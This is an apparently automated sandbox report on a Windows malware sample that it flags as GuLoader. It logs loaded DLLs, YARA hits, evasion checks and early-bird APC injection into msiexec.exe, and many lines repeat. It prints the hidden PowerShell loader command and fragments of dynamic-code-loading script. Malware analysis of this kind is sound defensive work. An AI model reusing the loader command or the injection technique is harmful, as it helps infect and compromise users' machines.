      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Xjz8dblHDe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: tem.Core.pdb source: powershell.exe, 00000001.00000002.2317799435.0000000008CD8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbz source: powershell.exe, 00000001.00000002.2317799435.0000000008CD8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdb) source: powershell.exe, 00000001.00000002.2317799435.0000000008CD8000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000001.00000002.2319447500.0000000009764000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.3316134163.00000000037E4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Hvalfangsternes $Unabsorbable $Slsomt), (Byggemodnet @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Dissimilationerne = [AppDomain]::CurrentDomain.GetAsse
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Transformationist)), $Uncleadpecac).DefineDynamicModule($Forkle, $false).DefineType($Rethresher, $Dipotassic44, [System.MulticastDeleg
      Suspicious powershell command line found
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)"
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D975DA push FFFFFF8Bh; iretd 1_2_07D975E3
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D989DC push FFFFFF8Bh; iretd 1_2_07D989E5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D991C9 push eax; iretd 1_2_07D991CA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D98B99 push esp; iretd 1_2_07D98B9A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D975A1 push FFFFFF8Bh; iretd 1_2_07D975AA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D98959 push esi; iretd 1_2_07D9895A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D98D5F push ebp; iretd 1_2_07D98D62
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D98541 push edx; iretd 1_2_07D98542
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D9B740 push FFFFFF8Bh; iretd 1_2_07D9B743
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D9A343 push FFFFFF8Bh; retf 1_2_07D9A34C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D99376 push esi; iretd 1_2_07D9937A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D9751F push ebx; iretd 1_2_07D97522
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D99529 push edi; iretd 1_2_07D9952A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D976F1 push esp; iretd 1_2_07D976F2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D978F2 push FFFFFF8Bh; iretd 1_2_07D978FB
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D978B9 push FFFFFF8Bh; iretd 1_2_07D978C2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D9B644 push 8B6AECBAh; iretd 1_2_07D9B649
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D97A01 push ebx; iretd 1_2_07D97A02
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D97837 push edi; iretd 1_2_07D9783A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D97E28 push ecx; iretd 1_2_07D97F8A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_09674549 push 8BD38B50h; iretd 1_2_0967454E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0967255C push 8BC808CCh; iretd 1_2_0967256A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6793Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2855Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -6456360425798339s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7060Thread sleep count: 40 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7060Thread sleep time: -400000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
      Source: msiexec.exe, 00000005.00000002.3316835676.0000000004288000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeAPI call chain: ExitProcess graph end nodegraph_0-3411
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeAPI call chain: ExitProcess graph end nodegraph_0-3565
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07D90FD0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,1_2_07D90FD0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3710000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$rapportudskrifter=get-content -raw 'c:\users\user\appdata\local\downrange\stutteriers\samfrdselen\resultatopgrelses186\sidelbende.kar';$stormogulernes=$rapportudskrifter.substring(56424,3);.$stormogulernes($rapportudskrifter)"
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$rapportudskrifter=get-content -raw 'c:\users\user\appdata\local\downrange\stutteriers\samfrdselen\resultatopgrelses186\sidelbende.kar';$stormogulernes=$rapportudskrifter.substring(56424,3);.$stormogulernes($rapportudskrifter)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
